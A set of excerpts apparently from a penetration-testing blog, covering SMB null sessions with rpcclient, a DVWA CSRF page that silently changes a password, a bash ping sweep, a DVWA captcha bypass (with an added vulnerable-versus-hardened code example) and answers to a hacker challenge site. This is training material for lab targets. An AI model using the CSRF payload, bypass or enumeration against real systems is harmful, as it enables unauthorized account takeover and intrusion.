While performing a pentest, if you discover a server running the SMB protocol, you can test whether it accepts anonymous connections (also called a null session) and then gather a lot of information with an RPC client. Nmap is useful to locate that kind of service:

[screenshot: smb null session]

Now you can try to interact with the remote machine with the help of rpcclient. To perform a null session you have to specify an empty user and an empty password. If the host is not vulnerable, you will get the following error:

$ rpcclient -U "" 192.168.1.31
Enter 's password:
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid for domain WORKGROUP
error: NT_STATUS_ACCESS_DENIED

But if the host is vulnerable you will immediately get a prompt:

$ rpcclient -U "" 192.168.1.18
Enter 's password:
rpcclient $>
...

Cross-Site Request Forgery, aka CSRF, is an attack unintentionally triggered by the victim user himself. It sends HTTP requests that execute unexpected actions in different ways: through an img tag to perform GET requests, or with Ajax requests when POST is required. You can learn basic CSRF in DVWA.

To perform this CSRF you first need to log in, then you must visit a malicious site that performs a stealthy HTTP request submitting the change-password form with specific values.

Low

The original request can be found by using a local proxy like Burp Suite or by analyzing HTTP headers with a browser extension like Live HTTP Headers. The payload:

<html>
  <head>
    <title>My malicious website</title>
  </head>
  <body>
    <p>It works like a charm!</p>
    <img src="http://local.dvwa.com/vulnerabilities/csrf/?password_new=azerty&password_conf=azerty&Change=Change" width="1" height="1" />
  </body>
</html>
...

In the second part of the first phase of a penetration test, active information gathering, it's important to map the network of your target as accurately as possible. To find live hosts there is a technique called ping sweep. Different tools exist to perform that task.

Ping

A single ping gives you the IP address of the target, the TTL and the round-trip time. However, since the method is based on ICMP requests, the target could be configured to block or drop them… With a simple bash script, you can loop through a range of IP addresses to test them all:

#!/bin/bash
# Ping sweep of 192.168.11.200-220: one ICMP echo request per host,
# keep only the "bytes from" replies and print the responding address.

for ip in $(seq 200 220); do
  ping -c 1 "192.168.11.$ip" | grep "bytes from" | cut -d " " -f 4 | cut -d ":" -f1 &
done
wait   # let the backgrounded pings finish before the script exits

The -c option is set to send only 1 request. grep is used to display only the hosts that respond to the request (and are supposedly alive), and finally cut is used for a nicer display. Notice the & at the end of the line; it's very useful to parallelize tasks and make the script faster. Here is the result:

[screenshot: ping sweep ping]

...

Captchas are usually used to prevent robots from performing an action meant for humans. They should add an extra layer of security, but badly configured they can lead to unauthorized access…

When you try to submit the form without providing a captcha code, you get the following error:

[screenshot: dvwa captcha error]

Low

Try to submit an empty password and take a look at the HTTP request and its parameters; you can notice the strange variable step:

[screenshot: dvwa captcha low]

This variable is the step in the change-password functionality, and the server trusts it to decide whether the captcha was already validated. So if you simply change it to 2 and replay the request with this new value, it works perfectly.
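The flaw is that the client decides which step it is on. The added example below (not DVWA's code, not part of the original post) models the two-step flow in Node.js twice: a version that trusts the step parameter, reproducing the bypass described above, and a version that records captcha success server-side in the session and consumes it on use. The captcha verification is stubbed with a constructed constant answer, and the session object, parameter names and result strings are assumptions of this example.

```javascript
// Added example, not DVWA's code: two-step change-password flow, vulnerable vs hardened.
// The captcha check is a constructed stand-in; real code would call the captcha service.
const CAPTCHA_ANSWER = 'k7x2p';

function verifyCaptcha(response) {
  return response === CAPTCHA_ANSWER;
}

// Vulnerable: step 1 validates the captcha and step 2 changes the password, but
// nothing ties the two together. Sending step=2 directly skips the captcha.
function handleVulnerable(session, params) {
  if (params.step === '1') {
    if (!verifyCaptcha(params.captcha)) return 'captcha incorrect';
    return 'captcha ok, confirm on step 2';
  }
  if (params.step === '2') {
    if (params.password_new !== params.password_conf) return 'passwords do not match';
    session.password = params.password_new;
    return 'password changed';
  }
  return 'unknown step';
}

// Hardened: the server keeps its own record of captcha success in the session and
// clears it when used, so a replayed step=2 request is rejected unless the captcha
// was solved in this session immediately before.
function handleHardened(session, params) {
  if (params.step === '1') {
    if (!verifyCaptcha(params.captcha)) return 'captcha incorrect';
    session.captchaPassed = true;
    return 'captcha ok, confirm on step 2';
  }
  if (params.step === '2') {
    if (!session.captchaPassed) return 'captcha not validated';
    session.captchaPassed = false; // one-shot: one solved captcha allows one change
    if (params.password_new !== params.password_conf) return 'passwords do not match';
    session.password = params.password_new;
    return 'password changed';
  }
  return 'unknown step';
}
```

The general rule this illustrates: any "you already passed check X" fact must live in server-side state, never in a hidden field or parameter the browser sends back.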

...

Hacker Test is an online hacker simulation: 20 levels to test your PHP, HTML and JavaScript knowledge. Below are the solutions for the first ten.

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

Level 1

In the source code we can see the following JavaScript lines:

var a="null";   // the expected password is the literal string "null"

function check()
{
  // compares what was typed in the input named "c" of the form named "a" with the variable a
  if (document.a.c.value == a) {
    document.location.href="http://www.hackertest.net/"+document.a.c.value+".htm";
  } else {
    alert ("Try again");
  }
}

The value of the password input named c is compared with the variable a, whose value is the string "null". This is the password: null

...